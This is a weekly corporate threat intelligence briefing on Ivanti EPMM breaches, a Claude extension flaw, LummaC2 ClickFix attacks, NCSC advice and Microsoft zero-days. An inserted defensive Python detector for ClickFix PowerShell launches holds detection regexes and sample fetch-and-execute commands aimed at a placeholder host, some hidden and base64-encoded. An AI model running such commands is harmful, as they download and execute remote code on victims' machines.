The Cyber Threat Intelligence Briefing is a weekly round-up of the latest cybersecurity news, trends and indicators, curated by our CISO, Nick Harris. Here’s our pick of the top stories, and why you should care.
Ivanti EPMM exploitation exposes several governments
Several European governments have had employee data compromised in what appears to be a coordinated campaign. The threat actors exploited at least one critical zero-day vulnerability in Ivanti Endpoint Manager Mobile (EPMM), a mobile device management product. The vendor issued patches for two critical zero-days on January 29. The European Commission and the Finnish and Dutch governments all issued statements confirming data breaches on February 6. Potentially compromised information included names, business email addresses, and telephone numbers.
Why it matters
Edge infrastructure, such as Ivanti EPMM, is an increasingly popular target for threat actors. In this case, exposed information could enable threat actors to launch convincing follow-on spear-phishing attacks for deeper system access.
Assured’s recommended action
Follow Ivanti’s instructions to patch the impacted products. Reset any related passwords and update user awareness training to warn of potential spear phishing. Place edge devices behind zero trust network access (ZTNA) gateways.
Unpatched zero-click flaw discovered in Claude Desktop Extensions
Researchers have discovered a critical vulnerability in 50 Claude Desktop Extensions (DXT) that could enable remote code execution (RCE) without user interaction. The bug has a CVSS score of 10.0 and could affect more than 10,000 active Claude DXT users, but Anthropic has declined to fix it at this time, citing that it “falls outside our current threat model.”
Why it matters
Anthropic’s Claude chatbot is popular with enterprise users, who may be using it without their IT department’s knowledge. Unlike sandboxed browser extensions, Claude DXTs run with full system privileges, exposing users to greater risk.
Assured’s recommended action
Treat MCP connectors such as Claude DXTs as unsafe. Where possible, audit their use across the enterprise and request removal. Block enterprise downloads of the chatbot.
Lumma infostealer infections surge
Researchers have observed an increase in LummaStealer (LummaC2) infections driven by social engineering “ClickFix” attacks. Bitdefender saw a significant surge in December and January, with LummaC2 delivered through the CastleLoader malware loader. Users are presented with fake CAPTCHA requests to trick them into executing malicious PowerShell commands.
Why it matters
LummaC2 is designed to steal a range of sensitive data, including credentials and cookies stored in web browsers, cryptocurrency wallet info, documents, session cookies, and 2FA backup codes and tokens. It could enable more serious data breaches and ransomware attacks.
Assured’s recommended action
Put controls in place to prevent users downloading and executing software or media from untrusted sources such as torrent sites. Update security awareness training to include ClickFix techniques. Block traffic to known infostealer C&C servers.
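The ClickFix chain described above ends with the user running a pasted PowerShell one-liner, typically via the Windows Run dialog, which gives defenders a telemetry hook. The following is an added example, not from the briefing or from Bitdefender: it scores constructed process-creation events for the command-line traits such launches tend to share. The event fields, regexes, weighting and threshold are illustrative assumptions, not a vendor detection rule.

```python
# Added example, not from the briefing: heuristic scoring of ClickFix-style PowerShell
# launches over constructed process-creation events. Field names, regexes and threshold
# are illustrative assumptions, not a vendor detection rule.
import base64
import re
from collections import namedtuple

ProcEvent = namedtuple("ProcEvent", "parent image cmdline")  # image names + command line

# Each indicator alone is weak; several on one explorer-spawned shell stand out.
INDICATORS = {
    "hidden_window": re.compile(r"-w(indow(style)?)?\s+h(idden)?", re.I),
    "encoded_cmd": re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download": re.compile(r"(DownloadString|Invoke-WebRequest|iwr|curl|wget)\b", re.I),
    "invoke_expr": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "bypass_policy": re.compile(r"-e(xecution)?p(olicy)?\s+bypass", re.I),
}

def decode_encoded_command(cmdline):
    """Decode a -EncodedCommand payload (base64 of UTF-16LE); '' if absent or malformed."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le") if m else ""
    except (ValueError, UnicodeDecodeError):
        return ""

def score_event(ev):
    """Return (score, matched indicator names); 0 for non-PowerShell images."""
    if ev.image.lower() not in {"powershell.exe", "pwsh.exe"}:
        return 0, []
    # Scan the decoded payload too, so -enc cannot hide the other indicators.
    text = ev.cmdline + " " + decode_encoded_command(ev.cmdline)
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # explorer.exe as parent means the user typed or pasted it (Run dialog), not a task.
    return len(hits) + (2 if ev.parent.lower() == "explorer.exe" else 0), hits

def flag_clickfix(events, threshold=3):
    """Return (event, score, hits) for each event scoring at or above threshold."""
    scored = [(ev, *score_event(ev)) for ev in events]
    return [t for t in scored if t[1] >= threshold]

# Constructed sample events (not real telemetry); example.invalid is a placeholder host.
_ENC = base64.b64encode("iex(iwr http://example.invalid/a)".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ProcEvent("svchost.exe", "powershell.exe", r"powershell.exe -File C:\scripts\inventory.ps1"),
    ProcEvent("explorer.exe", "powershell.exe", "powershell.exe"),  # user just opened a shell
    ProcEvent("explorer.exe", "powershell.exe", 'powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/v.txt)"'),
    ProcEvent("explorer.exe", "powershell.exe", f"powershell -enc {_ENC}"),
]
```

Only the two explorer-spawned shells carrying download-and-execute traits cross the threshold; a scheduled script and a user simply opening PowerShell do not, which is the false-positive behaviour to preserve when tuning the weights against your own telemetry.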
NCSC urges critical infrastructure firms to act now amid mounting threats
The National Cyber Security Centre (NCSC) has urged critical national infrastructure (CNI) providers to step up their efforts to improve cyber resilience. The call from the director for national resilience follows a recent sophisticated Russian campaign to sabotage Polish energy infrastructure.
Why it matters
State actors are becoming more emboldened to strike at CNI, especially in countries allied to Ukraine. A serious attack could cause major disruption to infrastructure, and economic, societal and reputational damage.
Assured’s recommended action
The NCSC urges CNI to consult its Cyber Assessment Framework (CAF) to “understand and implement an appropriate, and robust, level of cyber resilience.” It contains useful advice on risk management, identity and access controls, and threat hunting. The NCSC has also published separate advice on mitigating “severe” threats.
Microsoft patches six zero-day vulnerabilities
Microsoft issued patches for a whopping six actively exploited zero-day vulnerabilities in this month’s Patch Tuesday, three of which had been publicly disclosed. Three of the zero-days (CVE-2026-21510, CVE-2026-21513, CVE-2026-21514) allow attackers to bypass Windows security prompts. Two are elevation-of-privilege bugs (CVE-2026-21533 and CVE-2026-21519), and another (CVE-2026-21525) is a denial-of-service bug.
Why it matters
The zero-days are being actively exploited, making patching an immediate priority. There’s a greater risk of exploitation for those CVEs for which information has been publicly disclosed (CVE-2026-21513, CVE-2026-21510, and CVE-2026-21514).
Assured’s recommended action
No organisation’s exposure to CVEs is the same. Use a risk-based methodology to prioritise patching for those released in this month’s Patch Tuesday (including the zero-days).